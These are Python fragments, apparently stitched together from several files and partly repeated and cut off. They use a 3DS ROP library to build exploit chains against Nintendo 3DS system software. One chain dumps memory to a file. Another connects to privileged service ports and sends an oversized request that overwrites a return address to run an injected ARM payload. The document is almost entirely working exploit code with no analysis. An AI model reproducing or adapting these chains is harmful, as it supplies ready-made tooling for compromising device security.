def main(argv): r = ROP(0x002B0000) # Set file object u64 offset to 0 r.store_i32(0, 0x279004) r.store_i32(0, 0x279008) # file_open(0x279000, "YS:/DUMP.BIN", 6) r.call(0x1B82AC, [0x279000, Ref("fname"), 6], 5) # file_write(0x279000, 0x279020, 0x100000, 0x300000) r.call(0x1B3B54, [0x279000, 0x279020, 0x100000, 0x300000], 9) # Data. r.label("fname") r.data("YS:/DUMP.BIN".encode('utf-16le') + "\x00\x00") rop = r.gen() #hexdump(rop, base=0x2B0000) with open(argv[0], "wb") as f: f.write(rop)
# This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, version 2.0. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License 2.0 for more details. # # A copy of the GPL 2.0 should have been included with the program. # If not, see http://www.gnu.org/licenses/ from p3ds.util import * from p3ds.ROP import * r = ROP(0x002B0000) # Clear 0x279004 and 0x279008 #r.pop_r4(0x279004) #r.pop_r1(0x279008) #r.i32(0x101AAC) #r.i32(0x000004) #r.pop_r1(0) #r.store_r1(0x279004) #r.store_r1(0x279008) r.store_i32(0, 0x279004) r.store_i32(0, 0x279008)
def main(argv): # Fill ARM payload here (pls size aligned to 4 bytes, base @ 0x080C3EE0): PAYLOAD = "" r = ROP(0x002B0000) # ConnectToPort(&port, "srv:pm"); r.call_lr(0x1BEDC4, [Ref("port"), Ref("srv:pm")]) # sub_10CBC0() r.call(0x105C88, [], 3) # GetProcessId(&proc, 0xFFFF8001); r.call_lr(0x129C34, [Ref("proc"), 0xFFFF8001]) request(r, 0x04040040, Ref("proc"), Ref("port")) request(r, 0x04030082, Ref("proc"), Ref("port")) # sub_1B2130(&port, "ps:ps", 0x00000005) r.call(0x1B2134, [Ref("port"), Ref("ps:ps"), 0x00000005], 5) request(r, 0x20244, Ref("request"), Ref("port")) r.i32(0x19FB09) # Data. r.label("srv:pm") r.data("srv:pm\x00") r.label("ps:ps") r.data("ps:ps\x00") # Port. r.label("port") r.data("\x00" * 0x04) # Proc. r.label("proc") r.data( "\x00\x00\x00\x00\x18\x00\x00\x00\x02\x00\x18\x00") r.i32(Ref("wat?")) r.data("\x00" * 0x30) r.label("wat?") r.data( "\x41\x50\x54\x3A\x55\x00\x00\x00\x79\x32\x72\x3A\x75\x00\x00\x00" "\x67\x73\x70\x3A\x3A\x47\x70\x75\x6E\x64\x6D\x3A\x75\x00\x00\x00" "\x66\x73\x3A\x55\x53\x45\x52\x00\x68\x69\x64\x3A\x55\x53\x45\x52" "\x64\x73\x70\x3A\x3A\x44\x53\x50\x63\x66\x67\x3A\x75\x00\x00\x00" "\x66\x73\x3A\x52\x45\x47\x00\x00\x70\x73\x3A\x70\x73\x00\x00\x00" "\x6E\x73\x3A\x73\x00\x00\x00\x00\x61\x6D\x3A\x6E\x65\x74\x00\x00") r.data("\x00" * 0xA0) # Request. r.label("request") r.data("\x00" * 0x20) r.data("\x00\x00\x00\x00\x02\x00\x82\x00") r.i32(Ref("reqpart1")) r.data("\x0A\x44\x07\x00") # 0x7440 << 4 | 0xA r.i32(Ref("reqpart2")) r.data("\x00" * 0x4C) r.label("reqpart1") r.data("\x00" * 0x200) r.data("\x00\xA2\x03\x00") r.data("\x00" * 0xFC) r.label("reqpart2") # length = 0x7440, return addr = 0x080C3EE0 r.data(PAYLOAD + struct.pack("<I", 0x080C3EE0) * (0x7440/4 - len(PAYLOAD)/4)) rop = r.gen() #hexdump(rop, base=0x2B0000) with open(argv[0], "wb") as f: f.write(rop)